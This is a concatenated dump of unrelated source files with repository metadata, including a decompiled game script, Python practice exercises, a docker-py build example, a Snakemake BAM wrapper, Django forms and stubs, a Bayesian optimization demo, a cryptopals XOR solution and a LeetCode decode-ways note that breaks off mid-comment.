Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_5B2")
OP_99(0xFE, 0x0, 0x0, 0x5DC)
Sleep(500)
Jump("Function_4_598")
label("loc_5B2")
Return()
# Function_4_598 end
def Function_5_5B3(): pass
label("Function_5_5B3")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_5CD")
OP_99(0xFE, 0x0, 0x3, 0x3E8)
Sleep(500)
Jump("Function_5_5B3")
label("loc_5CD")
Return()
# Function_5_5B3 end
def Function_6_5CE(): pass
label("Function_6_5CE")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_61A")
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
Jump("Function_6_5CE")
label("loc_61A")
Return()
# Function_6_5CE end
def Function_7_61B(): pass
label("Function_7_61B")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_6D6")
SetChrChipByIndex(0xFE, 5)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 6)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_7_61B")
label("loc_6D6")
Return()
# Function_7_61B end
def Function_8_6D7(): pass
label("Function_8_6D7")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_792")
SetChrChipByIndex(0xFE, 15)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 16)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_8_6D7")
label("loc_792")
Return()
# Function_8_6D7 end
def Function_9_793(): pass
label("Function_9_793")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_84E")
SetChrChipByIndex(0xFE, 25)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 26)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_9_793")
label("loc_84E")
Return()
# Function_9_793 end
def Function_10_84F(): pass
label("Function_10_84F")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_864")
OP_99(0xFE, 0x0, 0x7, 0x640)
Jump("Function_10_84F")
label("loc_864")
Return()
# Function_10_84F end
def Function_11_865(): pass
label("Function_11_865")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_920")
SetChrChipByIndex(0xFE, 35)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
SetChrChipByIndex(0xFE, 36)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(100)
OP_51(0xFE, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(240)
Sleep(1000)
Jump("Function_11_865")
label("loc_920")
Return()
# Function_11_865 end
def Function_12_921(): pass
label("Function_12_921")
TalkBegin(0xFE)
ChrTalk( #0
0xFE,
"你好。\x02",
)
Jump("loc_93A")
label("loc_93A")
CloseMessageWindow()
TalkEnd(0xFE)
Return()
# Function_12_921 end
SaveToFile()
Try(main)
| [
"[email protected]"
] | |
be6a016ce6c16fe2faa6e74c48ad6571cc088641 | b33ddc7b89d05e19fdeb69593872fd174fab9f4f | /URI-py/2875.py | 49dc31d7091f31bea192a97075a7c40e9e9f21a3 | [] | no_license | ThiagoCComelli/URI-Online-Judge | 8b8d609d880342b39ba0d396c0610ecb7e01a5af | 5348f736b2d683f4b857232c22cccb7c1d8b8d65 | refs/heads/master | 2020-07-23T15:14:05.353948 | 2020-03-10T19:42:12 | 2020-03-10T19:42:12 | 207,606,956 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | # -*- coding: utf-8 -*-
while True:
try:
n,m = map(int, input().split())
lista = []
lista1= []
for i in range(n):
lista.append(input().split())
while True:
for i in range(n):
for j in range(m):
a =a
except EOFError:
break | [
"[email protected]"
] | |
0a1abc1df723114b5f626549217071f99ce3f6d6 | 1dce03e6f3f5b23d1e5c599678624638943b9422 | /docker/create_docker_images2.py | c963255960a9c9025948e08941e44f9ffe9c6e2f | [] | no_license | volat1977/byte_of_python | 76ec958bdc51c7538bb24e5d152b456feab603ca | 60b58ca3927ef5e2801c93dd676d5f8b4c03d9fc | refs/heads/master | 2020-12-26T07:23:10.562537 | 2020-03-24T05:31:03 | 2020-03-24T05:31:03 | 237,431,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | from io import BytesIO
import docker
dockerfile = '''
# Shared Volume
FROM busybox:buildroot-2014.02
VOLUME /data
CMD ["/bin/sh"]
'''
f = BytesIO(dockerfile.encode('utf-8'))
cli = docker.from_env()
response = cli.api.build(fileobj=f, rm=True, tag='test3', decode=True)
#for line in response:
# if line.keys()[0] in ('stream', 'error'):
# value = line.values()[0].strip()
# if value:
# print(value)
# for line in response:
# if line.keys in ('stream', 'error'):
# value = line.values()[0].strip()
# if value:
# print(value) | [
"[email protected]"
] | |
d753d0c4da9bb638deab2a12cfdd73f9e4680cb5 | bac7a7507933ac5bb38b41bbe2a587764da3cf94 | /snappy_wrappers/wrappers/link_in_bam/wrapper.py | 09790324734c2213f0b8a7b3f82af6b18a1c8997 | [
"MIT"
] | permissive | Pregelnuss/snappy-pipeline | 923b0f36117a2f55ee52f9a8564ed3bb82a8be16 | 31200eba84bff8e459e9e210d6d95e2984627f5c | refs/heads/master | 2023-06-19T07:24:04.736033 | 2021-05-27T07:24:05 | 2021-05-27T07:24:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | # -*- coding: utf-8 -*-
"""CUBI+Snakemake wrapper code for external: Snakemake wrapper.py
"""
from snakemake import shell
__author__ = "Oliver Stolpe <[email protected]>"
shell.executable("/bin/bash")
this_file = __file__
input = snakemake.params.args["input"]
if not input:
raise Exception("No bam found")
shell(
r"""
set -x
# Write out information about conda installation.
conda list >{snakemake.log.conda_list}
conda info >{snakemake.log.conda_info}
# Also pipe stderr to log file
if [[ -n "{snakemake.log.log}" ]]; then
if [[ "$(set +e; tty; set -e)" != "" ]]; then
rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
exec 2> >(tee -a "{snakemake.log.log}" >&2)
else
rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
echo "No tty, logging disabled" >"{snakemake.log.log}"
fi
fi
# Setup auto-cleaned TMPDIR
export TMPDIR=$(mktemp -d)
trap "rm -rf $TMPDIR" EXIT
mkdir -p $TMPDIR/tmp.d
# Link in bam files with the proper file name scheme
ln -sr {input} {snakemake.output.bam}
# Link in resultin BAM file or create index
if [[ -e {input}.bai ]]; then
ln -sr {input}.bai {snakemake.output.bam_bai}
else
samtools index {snakemake.output.bam}
fi
# Build MD5 files
pushd $(dirname {snakemake.output.bam})
md5sum $(basename {snakemake.output.bam}) > $(basename {snakemake.output.bam}).md5
md5sum $(basename {snakemake.output.bam_bai}) > $(basename {snakemake.output.bam_bai}).md5
popd
# QC Report ---------------------------------------------------------------------------------------
# gather statistics from BAM file
# TODO: use pipes for only reading once from disk?
samtools stats {snakemake.output.bam} > {snakemake.output.report_bamstats_txt}
samtools flagstat {snakemake.output.bam} > {snakemake.output.report_flagstats_txt}
samtools idxstats {snakemake.output.bam} > {snakemake.output.report_idxstats_txt}
# call plot-bamstats
mkdir $TMPDIR/bamstats.d
plot-bamstats \
-p $TMPDIR/bamstats.d/ \
{snakemake.output.report_bamstats_txt} \
|| true # ignore failure
# Convert HTML report into one file.
inline-html \
--in-file $TMPDIR/bamstats.d/index.html \
--out-file {snakemake.output.report_bamstats_html} \
|| touch {snakemake.output.report_bamstats_html}
# Build MD5 files for the reports
md5sum {snakemake.output.report_bamstats_html} > {snakemake.output.report_bamstats_html_md5}
md5sum {snakemake.output.report_bamstats_txt} > {snakemake.output.report_bamstats_txt_md5}
md5sum {snakemake.output.report_flagstats_txt} >{snakemake.output.report_flagstats_txt_md5}
md5sum {snakemake.output.report_idxstats_txt} > {snakemake.output.report_idxstats_txt_md5}
# Additional logging for transparency & reproducibility
# Logging: Save a copy this wrapper (with the pickle details in the header)
cp {this_file} $(dirname {snakemake.log.log})/wrapper.py
# Logging: Save a permanent copy of the environment file used
cp $(dirname {this_file})/environment.yaml $(dirname {snakemake.log.log})/environment_wrapper.yaml
"""
)
| [
"[email protected]"
] | |
e61d9c8b65dd2e6ddb62065629685896f512ffb7 | 0fe37e11df976c55fe5bbe492879b7cd8a95b7c5 | /1_2_python变量_输出和输入_数字_字符串/04_str_test.py | 3444adc19895857e5d4fee8cb2347e41708b2bfb | [] | no_license | 1286211699/mmc_code | 9bb7761107604b445dea4fe5acf9d503fbc28dfa | ee97879632dfd7d24c604f7db52c82fa29109daa | refs/heads/master | 2022-12-08T23:19:06.382825 | 2020-05-08T13:59:46 | 2020-05-08T13:59:46 | 177,100,815 | 2 | 0 | null | 2022-12-08T01:42:47 | 2019-03-22T08:25:37 | HTML | UTF-8 | Python | false | false | 1,896 | py |
# name = 'for'
#
# name = "for's name is for"
# print(name)
# print('abcd\tefg')
# print('My name is %s'%('for'))
# print('I am %d years old'%(18))
# print('his height is %f m'%(1.78))
# print('his height is %.2f m'%(1.78))
# name = 'while'
#
# print(name[1:3])
# str_test = 'hello world world'
#
# print(str_test.partition('o'))
# print(str_test.rpartition('o'))
# my_str = 'hello:world:python '
# print(my_str)
# print(my_str.replace('l','w'))
# # print(my_str.splitlines())
# # print(my_str.split(':'))
# print(str_test.count('l'))
#
# print(str_test.find('w'))
#
# print(str_test.rfind('w'))
#
# print(str_test.index('o'))
# print(str_test.rindex('o'))
# print(str_test[::-1])
# print(str_test[::-2])
#
# print(str_test[1:9:-1])
# print(str_test[9:1:-1])
# print(str_test[0:7])
#
# print(str_test[:7])
#
# print(str_test[2:])
#
# print(str_test[:])
# print(str_test[::2])
# print(str_test[0:7:2])
# str_test = ' for '
# print(str_test.strip())#在以后的数据清洗中战友很大的比重
# print(str_test.rstrip())
# print(str_test.lstrip())
# print(str_test.center(10,'x'))
# print(str_test.ljust(10,'x'))
# print(str_test.rjust(10,'x'))
# print(str_test.zfill(10))
#
# python = '{} is {}'
#
# print(python.format('for','cool'))
#
# print('hello'.upper())
# print('HELLO'.lower())
#
# print('12345a'.isalnum())
# print('abcdef'.isalpha())
# print('12345'.isdigit())
# print('HELLO'.isupper())
# print('hello'.islower())
# print(' '.isspace())
#
# print('for is cool'[3:].startswith(' '))
# print('for is cool'[3:].endswith('cool'))
# print(ord('a'))
# print(chr(97))
u = '学神'
str1 = u.encode()
print(str1)
str2 = u.encode()
print(str2)
u1 = str1.decode('gbk')
print(u1)
u2 = str2.decode('utf-8')
print(u2)
| [
"[email protected]"
] | |
404ccc4de81309e69083b0b19bb3d53830a09a20 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-gaussdbfornosql/huaweicloudsdkgaussdbfornosql/v3/model/list_instances_datastore_result.py | 34f5b1f20917eabd5ea29c17543d8217b496429f | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,366 | py | # coding: utf-8
import re
import six
class ListInstancesDatastoreResult:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'type': 'str',
'version': 'str'
}
attribute_map = {
'type': 'type',
'version': 'version'
}
def __init__(self, type=None, version=None):
"""ListInstancesDatastoreResult - a model defined in huaweicloud sdk"""
self._type = None
self._version = None
self.discriminator = None
self.type = type
self.version = version
@property
def type(self):
"""Gets the type of this ListInstancesDatastoreResult.
数据库引擎。
:return: The type of this ListInstancesDatastoreResult.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListInstancesDatastoreResult.
数据库引擎。
:param type: The type of this ListInstancesDatastoreResult.
:type: str
"""
self._type = type
@property
def version(self):
"""Gets the version of this ListInstancesDatastoreResult.
数据库版本号。
:return: The version of this ListInstancesDatastoreResult.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ListInstancesDatastoreResult.
数据库版本号。
:param version: The version of this ListInstancesDatastoreResult.
:type: str
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListInstancesDatastoreResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
3c061683d05e01d2e49fdf44a9642b8ba3230d38 | 7942342d457276bb266228d0236af647b3d55477 | /django/contrib/auth/__init__.pyi | 24b49bc00c2f2782b020918d77e8d81ac3a388da | [
"MIT"
] | permissive | AsymmetricVentures/mypy-django | 847c4e521ce4dec9a10a1574f9c32b234dafd00b | f6e489f5cf5672ecede323132665ccc6306f50b8 | refs/heads/master | 2020-06-30T01:53:44.434394 | 2016-12-22T22:45:50 | 2016-12-22T22:45:50 | 74,397,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | pyi | # Stubs for django.contrib.auth (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any, Optional
from django.apps import apps as django_apps
from .signals import user_logged_in as user_logged_in, user_logged_out as user_logged_out, user_login_failed as user_login_failed
SESSION_KEY = ... # type: str
BACKEND_SESSION_KEY = ... # type: str
HASH_SESSION_KEY = ... # type: str
REDIRECT_FIELD_NAME = ... # type: str
def load_backend(path): ...
def get_backends(): ...
def authenticate(**credentials): ...
def login(request, user, backend: Optional[Any] = ...): ...
def logout(request): ...
def get_user_model(): ...
def get_user(request): ...
def get_permission_codename(action, opts): ...
def update_session_auth_hash(request, user): ...
default_app_config = ... # type: str
| [
"[email protected]"
] | |
0405898d24af93f463de789847b0398a0e8e0b97 | 092d82f8a64f8e33a739ae023667253a75bfb9ae | /jury/forms.py | ac08bc91b6d6b266345bc9fb2f865acbf50bba23 | [
"MIT"
] | permissive | COdingaorg/The_Jury | 8c103eec028891b1ee98ede786fb54638bd16ba6 | a4432269a023edf49a010644ca4f06324a934d7f | refs/heads/main | 2023-06-18T10:43:14.888503 | 2021-07-20T16:05:59 | 2021-07-20T16:05:59 | 386,658,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | from jury.models import UserProfile, UserProject
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class registerUser(UserCreationForm):
class Meta:
model = User
fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']
class UploadProjectForm(forms.ModelForm):
class Meta:
model = UserProject
fields = ['project_title', 'project_image', 'project_description', 'project_link']
class AddorEditProfile(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['photo_path', 'user_bio', 'facebook_account', 'twitter_account', 'instagram_account']
| [
"[email protected]"
] | |
5404e3ad8934d8abdd386447c64ee0c0a8c716f7 | 93f5ee5cc7b863029c54a766e9f5fa0b0e52191f | /BayesianOptimization/20180403_two_hparas.py | f2c660d6aa1078720adfdb30d305f189ed7051c7 | [] | no_license | ShihPingLai/Jacob-deep_learning | 29ad17839da7a34e01db1a626942862e250e8619 | dfbaa178ac537a189a062a23904072a7d8e550a9 | refs/heads/master | 2020-03-13T11:51:51.276939 | 2018-04-26T04:19:15 | 2018-04-26T04:19:15 | 131,108,620 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,156 | py | #!/usr/bin/python3
'''
Abstract:
This is a program to exercise how to optimize deep learning with Bayesian Optimization.
Copy from "BayesianOptimization/examples/exploitation vs exploration.ipynb"
Usage:
20180403_two_hparas.py
Source:
BayesianOptimization/examples/exploitation vs exploration.ipynb
##################################
# Python3 #
# This code is made in python3 #
##################################
20170403
####################################
update log
20180403 version alpha 1:
1. I don't know
'''
# modules for Bayesian
from bayes_opt import BayesianOptimization
import pymc as pm
# modules for deep learning
import tensorflow as tf
# common modules
import numpy as np
import matplotlib.pyplot as plt
import time
from IPython.core.pylabtools import figsize
# Utility function for plotting
def plot_bo(f, bo, figname):
xs = [x["x"] for x in bo.res["all"]["params"]]
ys = bo.res["all"]["values"]
mean, sigma = bo.gp.predict(np.arange(len(f)).reshape(-1, 1), return_std=True)
plt.figure(figsize=(16, 9))
plt.plot(f)
plt.plot(np.arange(len(f)), mean)
plt.fill_between(np.arange(len(f)), mean+sigma, mean-sigma, alpha=0.1)
plt.scatter(bo.X.flatten(), bo.Y, c="red", s=50, zorder=10)
plt.xlim(0, len(f))
plt.ylim(f.min()-0.1*(f.max()-f.min()), f.max()+0.1*(f.max()-f.min()))
plt.savefig(figname)
return
#--------------------------------------------
# main code
if __name__ == "__main__":
VERBOSE = 0
# measure times
start_time = time.time()
#-----------------------------------
# load hyperparas
# use sklearn's default parameters for theta and random_start
gp_params = {"alpha": 1e-5, "n_restarts_optimizer": 2}
# Target function
np.random.seed(42)
xs = np.linspace(-2, 10, 10000)
f = np.exp(-(xs - 2)**2) + np.exp(-(xs - 6)**2/10) + 1/ (xs**2 + 1)
if VERBOSE>0:
plt.plot(f)
plt.show()
#-----------------------------------
# Acquisition function 1: Upper Confidence Bound
# Prefer exploitation (kappa=1.0)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=1, **gp_params)
plot_bo(f, bo, "ucb_exploitation.png")
# Prefer exploration (kappa=10)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=10, **gp_params)
plot_bo(f, bo, "ucb_exploration.png")
#-----------------------------------
# Acquisition function 2: Expected Improvement
# Prefer exploitation (xi=0.0)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ei", xi=1e-4, **gp_params)
plot_bo(f, bo, "ei_exploitation.png")
# Prefer exploration (xi=0.1)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ei", xi=0.1, **gp_params)
plot_bo(f, bo, "ei_exploration.png")
#-----------------------------------
# Acquisition function 3: Probability of Improvement
# Prefer exploitation (xi=0.0)
bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="poi", xi=1e-4, **gp_params)
plot_bo(f, bo, "poi_exploitation.png")
# Prefer exploration (xi=0.1)
bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="poi", xi=0.1, **gp_params)
plot_bo(f, bo, "poi_exploration.png")
#-----------------------------------
# measuring time
elapsed_time = time.time() - start_time
print ("Exiting Main Program, spending ", elapsed_time, "seconds.")
| [
"[email protected]"
] | |
c88a1af397f5418a03100cac9cde8e9e4629f207 | 34d1d64a049dd3a25293955f6312072f2fcb3905 | /set-1/challenge2.py | f54288641f2df4a0648832da78827542e6a9bb54 | [] | no_license | alex-bellon/cryptopals | c82ec87377911e6cae365cb48b2058789b93b9a1 | 5bc6242a5b972866ba7eebe2f6efa80c7ebff71c | refs/heads/master | 2020-05-03T18:40:02.320249 | 2019-08-16T21:15:27 | 2019-08-16T21:15:27 | 178,761,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | a = '1c0111001f010100061a024b53535009181c'
b = '686974207468652062756c6c277320657965'
aBin = bin(int(a, 16))[2:]
bBin = bin(int(b, 16))[2:]
c = int(aBin, 2) ^ int(bBin, 2)
print(hex(c))
| [
"[email protected]"
] | |
26534e055871d229971a287afd01f30afec488e8 | 03d07de94fc22d1583c45ca84c711a06df8a40ff | /lc/dynamic_programming/lc_91_decode-ways.py | 47e6fb60ea6793ea85275e7e4575d8b528ab5713 | [] | no_license | gaopenghigh/algorithm | 94e04293c69a2ad6903495e1cf6e1b75556535bb | f5d78c98c7201c56f9d4c3a9c0c76e9447a17985 | refs/heads/master | 2022-03-11T18:46:38.712923 | 2022-02-20T14:20:54 | 2022-02-20T14:20:54 | 54,484,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,054 | py | # 91. 解码方法
# 难度 中等
# 一条包含字母 A-Z 的消息通过以下映射进行了 编码 :
# 'A' -> "1"
# 'B' -> "2"
# ...
# 'Z' -> "26"
# 要 解码 已编码的消息,所有数字必须基于上述映射的方法,反向映射回字母(可能有多种方法)。例如,"11106" 可以映射为:
# "AAJF" ,将消息分组为 (1 1 10 6)
# "KJF" ,将消息分组为 (11 10 6)
# 注意,消息不能分组为 (1 11 06) ,因为 "06" 不能映射为 "F" ,这是由于 "6" 和 "06" 在映射中并不等价。
# 给你一个只含数字的 非空 字符串 s ,请计算并返回 解码 方法的 总数 。
# 题目数据保证答案肯定是一个 32 位 的整数。
#
# 示例 1:
# 输入:s = "12"
# 输出:2
# 解释:它可以解码为 "AB"(1 2)或者 "L"(12)。
#
# 示例 2:
# 输入:s = "226"
# 输出:3
# 解释:它可以解码为 "BZ" (2 26), "VF" (22 6), 或者 "BBF" (2 2 6) 。
#
# 示例 3:
# 输入:s = "0"
# 输出:0
# 解释:没有字符映射到以 0 开头的数字。
# 含有 0 的有效映射是 'J' -> "10" 和 'T'-> "20" 。
# 由于没有字符,因此没有有效的方法对此进行解码,因为所有数字都需要映射。
#
# 提示:
# 1 <= s.length <= 100
# s 只包含数字,并且可能包含前导零。
# 动态规划第一步要明确两点,「状态」和「选择」。
# 状态,就是对一个局面的描述。通过一个状态,可以定义一个子问题,而动态规划的核心就是分解为子问题。
# 选择,就是某个动作,通过一个动作,问题可以拆解为子问题
# 动态规划的框架如下:
# for 状态1 in 状态1的所有取值:
# for 状态2 in 状态2的所有取值:
# for ...
# dp[状态1][状态2][...] = 择优(选择1,选择2...)
#
# 本题中,“状态”就是带解码的字符串,
# 至于选择,对于每个字符串的最后一个字符,可以选择自成一体,或者选择与它前面的字符合体。
# 使用 dp[i] = x 表示 s[:i] 最多有 x 中解码方式。
# 对于 s[:i] 的最后一个字符 s[i-1],有如下几种情况
# 1. s[i-1] 自称一体,前提是 1 <= int(s[i-1]) <= 9,则 dp[i] = dp[i-1]
